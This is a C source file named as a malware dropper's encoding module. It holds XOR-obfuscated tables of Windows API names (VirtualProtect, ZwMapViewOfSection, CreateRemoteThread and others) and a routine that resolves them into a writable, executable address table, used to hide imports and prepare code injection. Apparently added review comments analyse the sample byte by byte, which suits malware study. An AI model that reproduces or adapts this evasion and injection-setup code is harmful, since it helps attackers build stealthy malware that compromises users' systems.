dropper_Encoding.c

Feb 18th, 2023
  1. #include "4. Encoding.h"
  2. #include "9. AssemblyBlock2.h"
  3. #include "A. EncodingAlgorithms.h"
  4.  
  5. #include "define.h"
  6.  
/*
 * Obfuscated export names, one WORD per character, consumed by
 * DecodeEncryptedModuleNames() below. Each table is named after the plaintext
 * it stands for and has strlen(name) + 1 elements. Every element carries the
 * constant high byte 0xAE and every table ends in 0xAE12, so the trailing
 * element is presumably the encoded NUL terminator. The visible values are
 * consistent with low byte = ASCII ^ 0x12 (e.g. 'V' 0x56 -> 0xAE44,
 * 'e' 0x65 -> 0xAE77), but the decoder itself is not in this file
 * (presumably "A. EncodingAlgorithms.h" / the GetFunctionFrom* helpers).
 *
 * NOTE(review): because the key is fixed at build time, these tables are a
 * stable static artefact of the sample; keep them byte-exact.
 */
const WORD ENCODED_lstrcmpiW[10] =
{
    0xAE7E, 0xAE61, 0xAE66, 0xAE60,
    0xAE71, 0xAE7F, 0xAE62, 0xAE7B,
    0xAE45, 0xAE12
};

const WORD ENCODED_VirtualQuery[13] =
{
    0xAE44, 0xAE7B, 0xAE60, 0xAE66,
    0xAE67, 0xAE73, 0xAE7E, 0xAE43,
    0xAE67, 0xAE77, 0xAE60, 0xAE6B,
    0xAE12
};

const WORD ENCODED_VirtualProtect[15] =
{
    0xAE44, 0xAE7B, 0xAE60, 0xAE66,
    0xAE67, 0xAE73, 0xAE7E, 0xAE42,
    0xAE60, 0xAE7D, 0xAE66, 0xAE77,
    0xAE71, 0xAE66, 0xAE12
};

const WORD ENCODED_GetProcAddress[15] =
{
    0xAE55, 0xAE77, 0xAE66, 0xAE42,
    0xAE60, 0xAE7D, 0xAE71, 0xAE53,
    0xAE76, 0xAE76, 0xAE60, 0xAE77,
    0xAE61, 0xAE61, 0xAE12
};

const WORD ENCODED_MapViewOfFile[14] =
{
    0xAE5F, 0xAE73, 0xAE62, 0xAE44,
    0xAE7B, 0xAE77, 0xAE65, 0xAE5D,
    0xAE74, 0xAE54, 0xAE7B, 0xAE7E,
    0xAE77, 0xAE12
};

const WORD ENCODED_UnmapViewOfFile[16] =
{
    0xAE47, 0xAE7C, 0xAE7F, 0xAE73,
    0xAE62, 0xAE44, 0xAE7B, 0xAE77,
    0xAE65, 0xAE5D, 0xAE74, 0xAE54,
    0xAE7B, 0xAE7E, 0xAE77, 0xAE12
};

const WORD ENCODED_FlushInstructionCache[22] =
{
    0xAE54, 0xAE7E, 0xAE67, 0xAE61,
    0xAE7A, 0xAE5B, 0xAE7C, 0xAE61,
    0xAE66, 0xAE60, 0xAE67, 0xAE71,
    0xAE66, 0xAE7B, 0xAE7D, 0xAE7C,
    0xAE51, 0xAE73, 0xAE71, 0xAE7A,
    0xAE77, 0xAE12
};

const WORD ENCODED_LoadLibraryW[13] =
{
    0xAE5E, 0xAE7D, 0xAE73, 0xAE76,
    0xAE5E, 0xAE7B, 0xAE70, 0xAE60,
    0xAE73, 0xAE60, 0xAE6B, 0xAE45,
    0xAE12
};

const WORD ENCODED_FreeLibrary[12] =
{
    0xAE54, 0xAE60, 0xAE77, 0xAE77,
    0xAE5E, 0xAE7B, 0xAE70, 0xAE60,
    0xAE73, 0xAE60, 0xAE6B, 0xAE12
};

const WORD ENCODED_ZwCreateSection[16] =
{
    0xAE48, 0xAE65, 0xAE51, 0xAE60,
    0xAE77, 0xAE73, 0xAE66, 0xAE77,
    0xAE41, 0xAE77, 0xAE71, 0xAE66,
    0xAE7B, 0xAE7D, 0xAE7C, 0xAE12
};

const WORD ENCODED_ZwMapViewOfSection[19] =
{
    0xAE48, 0xAE65, 0xAE5F, 0xAE73,
    0xAE62, 0xAE44, 0xAE7B, 0xAE77,
    0xAE65, 0xAE5D, 0xAE74, 0xAE41,
    0xAE77, 0xAE71, 0xAE66, 0xAE7B,
    0xAE7D, 0xAE7C, 0xAE12
};

const WORD ENCODED_CreateThread[13] =
{
    0xAE51, 0xAE60, 0xAE77, 0xAE73,
    0xAE66, 0xAE77, 0xAE46, 0xAE7A,
    0xAE60, 0xAE77, 0xAE73, 0xAE76,
    0xAE12
};

const WORD ENCODED_WaitForSingleObject[20] =
{
    0xAE45, 0xAE73, 0xAE7B, 0xAE66,
    0xAE54, 0xAE7D, 0xAE60, 0xAE41,
    0xAE7B, 0xAE7C, 0xAE75, 0xAE7E,
    0xAE77, 0xAE5D, 0xAE70, 0xAE78,
    0xAE77, 0xAE71, 0xAE66, 0xAE12
};

const WORD ENCODED_GetExitCodeThread[18] =
{
    0xAE55, 0xAE77, 0xAE66, 0xAE57,
    0xAE6A, 0xAE7B, 0xAE66, 0xAE51,
    0xAE7D, 0xAE76, 0xAE77, 0xAE46,
    0xAE7A, 0xAE60, 0xAE77, 0xAE73,
    0xAE76, 0xAE12
};

const WORD ENCODED_ZwClose[8] =
{
    0xAE48, 0xAE65, 0xAE51, 0xAE7E,
    0xAE7D, 0xAE61, 0xAE77, 0xAE12
};

/* The two tables below are defined but not referenced by
 * DecodeEncryptedModuleNames() in this file; their consumer, if any, is elsewhere. */
const WORD ENCODED_CreateRemoteThread[19] =
{
    0xAE51, 0xAE60, 0xAE77, 0xAE73,
    0xAE66, 0xAE77, 0xAE40, 0xAE77,
    0xAE7F, 0xAE7D, 0xAE66, 0xAE77,
    0xAE46, 0xAE7A, 0xAE60, 0xAE77,
    0xAE73, 0xAE76, 0xAE12
};

const WORD ENCODED_NtCreateThreadEx[17] =
{
    0xAE5C, 0xAE66, 0xAE51, 0xAE60,
    0xAE77, 0xAE73, 0xAE66, 0xAE77,
    0xAE46, 0xAE7A, 0xAE60, 0xAE77,
    0xAE73, 0xAE76, 0xAE57, 0xAE6A,
    0xAE12
};
  145.  
  146. // 100% (C) CODE MATCH
/*
 * Resolve the obfuscated export names above to addresses and store them in
 * the global g_hardAddrs table (type HARDCODED_ADDRESSES, slots addressed
 * through the _F() macro; both are defined in headers not shown here).
 *
 * Returns FALSE only when the table's page can be made writable with neither
 * PAGE_EXECUTE_WRITECOPY nor PAGE_EXECUTE_READWRITE. Otherwise returns TRUE
 * unconditionally: a NULL result from any GetFunctionFrom* lookup is stored
 * as-is and the caller gets no indication of a partially filled table.
 *
 * NOTE(review): the previous protection saved in dwOld is never restored, so
 * the page holding g_hardAddrs is left writable and executable after this
 * call (see the VirtualProtect pair below) — a protection change on a
 * data table that endpoint telemetry can legitimately treat as anomalous.
 * NOTE(review): `_F` is a reserved identifier in C (leading underscore
 * followed by an uppercase letter).
 */
BOOL DecodeEncryptedModuleNames()
{
    DWORD dwOld;

    /* First attempt copy-on-write; the second call runs only if the first
     * fails (short-circuit &&). Both failing is the only FALSE path. dwOld is
     * written by whichever call succeeds and then never read again. */
    if(!VirtualProtect((LPVOID)&g_hardAddrs, sizeof(HARDCODED_ADDRESSES), PAGE_EXECUTE_WRITECOPY, &dwOld) &&
       !VirtualProtect((LPVOID)&g_hardAddrs, sizeof(HARDCODED_ADDRESSES), PAGE_EXECUTE_READWRITE, &dwOld))
        return FALSE;

    /* ntdll base is stored before any GetFunctionFromNTDLL() lookup below;
     * presumably that helper reads this slot — confirm in its definition. */
    *(HMODULE*)_F(NTDLL_DLL) = GetModuleNTDLL();

    /* Every address is narrowed to DWORD, which would lose the upper half of
     * a 64-bit pointer; this path is presumably 32-bit-only. */
    *(DWORD*)_F(lstrcmpiW            ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_lstrcmpiW);
    *(DWORD*)_F(VirtualQuery         ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_VirtualQuery);
    *(DWORD*)_F(VirtualProtect       ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_VirtualProtect);
    *(DWORD*)_F(GetProcAddress       ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_GetProcAddress);
    *(DWORD*)_F(MapViewOfFile        ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_MapViewOfFile);
    *(DWORD*)_F(UnmapViewOfFile      ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_UnmapViewOfFile);
    *(DWORD*)_F(FlushInstructionCache) = (DWORD)GetFunctionFromKERNEL32(ENCODED_FlushInstructionCache);
    *(DWORD*)_F(LoadLibraryW         ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_LoadLibraryW);
    *(DWORD*)_F(FreeLibrary          ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_FreeLibrary);
    *(DWORD*)_F(ZwCreateSection      ) = (DWORD)GetFunctionFromNTDLL(ENCODED_ZwCreateSection);
    *(DWORD*)_F(ZwMapViewOfSection   ) = (DWORD)GetFunctionFromNTDLL(ENCODED_ZwMapViewOfSection);
    *(DWORD*)_F(CreateThread         ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_CreateThread);
    *(DWORD*)_F(WaitForSingleObject  ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_WaitForSingleObject);
    *(DWORD*)_F(GetExitCodeThread    ) = (DWORD)GetFunctionFromKERNEL32(ENCODED_GetExitCodeThread);
    *(DWORD*)_F(ZwClose              ) = (DWORD)GetFunctionFromNTDLL(ENCODED_ZwClose);

    /* No lookup result is checked; TRUE here means only "page was made writable". */
    return TRUE;
}